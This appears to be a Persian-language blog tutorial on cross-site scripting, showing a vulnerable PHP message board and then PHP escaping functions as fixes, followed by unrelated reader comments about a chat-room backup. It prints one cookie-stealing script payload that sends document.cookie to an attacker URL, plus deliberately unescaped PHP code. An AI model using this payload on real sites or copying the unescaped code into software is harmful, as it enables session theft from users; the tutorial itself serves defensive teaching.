شمـا میتوانیــد برای دریافت آخرین مطالب و آگاهی از آخریـن اخبــار گلریـز وبـــ در ایمیـــل خـود در خبــرنامـه ثـبت نـام کنــید
- آخــرین مطــالب
- مطالب پربازدیــد
- مطالب تصــادفـی آرشیــو پسـت هـا
آمار سایت
Demo
میزکار کاربری
Desktop
نویسندگان
Author
لینک های سایت
Links
آرشیو
Archive
صفحات جداگانه
Extra Pages
پیوند های روزانه
Daily Links
امکانات وب
Code
خبرنامه وب سایت:
آخرین نظرات کاربران
Recent Comments
شمـا میتوانیــد برای دریافت آخرین مطالب و آگاهی از آخریـن اخبــار گلریـز وبـــ در ایمیـــل خـود در خبــرنامـه ثـبت نـام کنــید
عنوان | پاسخ | بازدید | توسط |
موضوع خیلی خیلی مهم | 2 | 6860 | love moon |
آموزش رویت | 1 | 6683 | amirzarbakhsh |
بکاب گلستان طرح | 2 | 7742 | iliyakianfar |
پک درجات چت روم طرح (پروانه) | 1 | 7582 | s1i2n3a4 |
مژده!! مژده!! عجله کنید انتقال روی سرور های گروه طراحی فلای طرح رایگان شد!! | 2 | 5192 | flytarh |
8 عدد درجه جدید برای روم | 3 | 8068 | s1i2n3a4 |
در این پست شما را با نحوه رخ دادن حملات xss آشنا می کنم./
این حملات زمانی رخ می دهد که یک سایت کد مخرب از کاربر دریافت کند و این کد از طریق این سایت در کامپیوتر قربانی مورد پردازش قرار گیرد. در واقع نفوذگر کد مخرب خود را که بر پایه دستورات html,JavaScript,Css هست را به سایت آسیب پذیر وارد کرده و سایت بدون هیچ فیلتر و یا پردازش ورودی این کد را بر روی کامپیوتر قربانی اجرا می کند./ این روش بیشتر برروی نفوذ از طریق کاربران تمرکز دارد./
این حمله از اعتماد یک کاربر به سایت سوء استفاده می شود و بر اساس همین اعتماد کدهای تزریق شده برروی کامپیوتر قربانی اجرا شده و این کدها می توانند هویت این کاربر را نزد نفوذگر افشا کنند./
حملات xss به صورت مختلفی پایه گذاری می شوند:
- فرستان یک لینک به کاربران مجاز: در این روش نفوذگر یک لینک را به کاربر ارسال می نماید و کاربر را ترغیب به رفتن به این لینک می نماید که متاسفانه پس از کلیک کد برروی سیستم قربانی اجرا می شود./
- اجرای کد توسط سایت مورد اعتماد کاربر که از آن بازدید می نماید: ممکن است شما نیز به دام این حمله افتاده باشید و پس از مشاهده یک پیغام و یا پست در سایت مورد علاقه خود مورد حمله قرار گرفته باشید. معمولا در تالارهایی که امکان استفاده از کدهای جاوا و html وجود دارد این نوع حمله قابل مشاهده است.
- کدهای مخرب ارسال شده توسط یک کاربر برای دیگر کاربران: در طول روز با سایت های زیادی بر خورد می کنید که ممکن است در هرکدام از این سایت ها امکان ارسال نظرات و پیام برای شما میسر باشد. حال اگر این پیام بدون هیچ کنترل و فیلتر مورد پردازش قرار گیرد نتیجه چیست؟؟؟ بله قطعا فاجعه برای کاربرانی که به این سایت اعتماد کرده اند و ممکن است تمامی اطلاعاتشان در خطر قرار گیرد.
کد زیر را در نظر بگیرید:
<?php if (isset($_POST['message'])){ file_put_contents('board.txt',"{$_POST['message']}<hr/>",FILE_APPEND); } $messages=file_get_contents('board.txt'); echo $messages; ?>
در این مثال متن گرفته شده از کاربر بدون هیچ پردازشی در فایل board.txt قرار گرفت تا برای کاربران نمایش داده شود.
حال اگر نفوذگر کد زیر را وارد نماید:
<script>document.location='http://silentDi3.co.cc/cookieGraber.php?cookies='+document.cookie</script>
نتیجه آن می شود که هرکاربری مجاز سایت از این نظر و این قسمت مشاهده نماید کوکی مورد استفاده این کاربر برای نفوذگر ارسال می شود./
---------------
حالا نحوه ی پچ کردن باگ xss رو با هم بررسی میکنیم.
همونطور که توضیح دادم این باگ عموما بر اثر بی توجهی و عدم بررسی ورودی ها رخ می دهد./ حالا اگه ما ورودی ها رو چک کنیم دیگه جای هیچ مشکلی نمی مونه./ کد زیر را در نظر بگیرید:
<?php $temp = $_GET['search']; echo $temp ?>
همانطور که مشاهده می کنید این یک کد آسیب پذیر به باگ xss است./ در زیر به روش های پچ این باگ می پردازیم.
1- استفاده از تابع addslash() : این تابع یک اسلش به ورودی های مشکوک به این حمله اضافه می کند( مانند: ',",...)
<?php $temp=addslash($_GET['search']); echo $temp; ?>
این روش یک روش معمول و پر استفاده می باشد اما ایمن نست و به راحتی قابل دور زدن است.!
2- استفاده از تابع htmlspecialchars() : کار این تابع این است که تمامی کاراکتر های استاندارد زبان html را به کد شده آن تبدیل می کند که دقیقا همان کاراکتر ها را در خروجی نمایش می دهد./
<?php $temp=htmlspecialchars($_GET['search']); echo $temp; ?>
این روش می تواند روش موثری در برابر این نوع حملات باشد.
3- استفاده از تابع htmlentities() : این تابع نیز دقیقا مانند تابع بالا عمل کرده و از عملکرد مناسب تر و دقیقتری برخوردار است:
<?php $temp=htmlentities($_GET['search']); echo $temp; ?>
4- سایر روش های جلوگیری: این روش ها بستگی به خلاقیت برنامه نویس دارد و اینکه از کدام روشها استفاده نماید./
نویسنده : S1I2N3A4
دسته : نکات و دستورات چت روم , ,
بکابش سخته هر کی طراح نیس بدرد نمیخوره خود منم ****** دادم درس نشد
سلام لینک ها خرابن لطفا اصلاح کنید با تشکر
ببخشید بکاپ بدون باگ شل هستش
مشخصات ورودی به پنل اضطراری چیه
سلام ببخشید میشه ادرس پنل اضطراری رو بگین ممنون میشم چون پنل اضطراریش فقط با ادرس بالا میاد
پاسخ:سلام. آخر آدرس emergency این کلمه رو اضافه کنید
سلام بکاپ کاملا سالمه نه مشکل ورود داره و نه استایل پنجره ها ثابته. دوستانی که مشکل دارن با مهر طرح در ارتباط باشن با هزینه براتون نصب و پشتیبانی میکنیم
من تمام اسکریپت یا بکاپ های اینجا رو نصب کردم ولی این یکی رو هر کار کردم نصب نشد تشکر از مدیر گلریز ویب خسته نباشی ارزوی سلامتی ارم
پاسخ:قربانت زنده باشید و به ما خیلی شما لطف دارید(تشکر فراوان از شما دوست عزیز)
نصب کردم عالیه راحت بالا میاد استایل پنجره ه برعکس ورژن17 و مرورگر کنار اسم سالمه فقط تو لینک دونی ادرس وبلاگم میدم بالا نمی یاره وکار مجازی هم با تعداد محدود میشه ساخت سطوح کاربری هم مشکل داره سطح جدید میسازم با اینکه اولویت پایین میدم باز میره اول و به درجه دار پایین دسترسی ندارم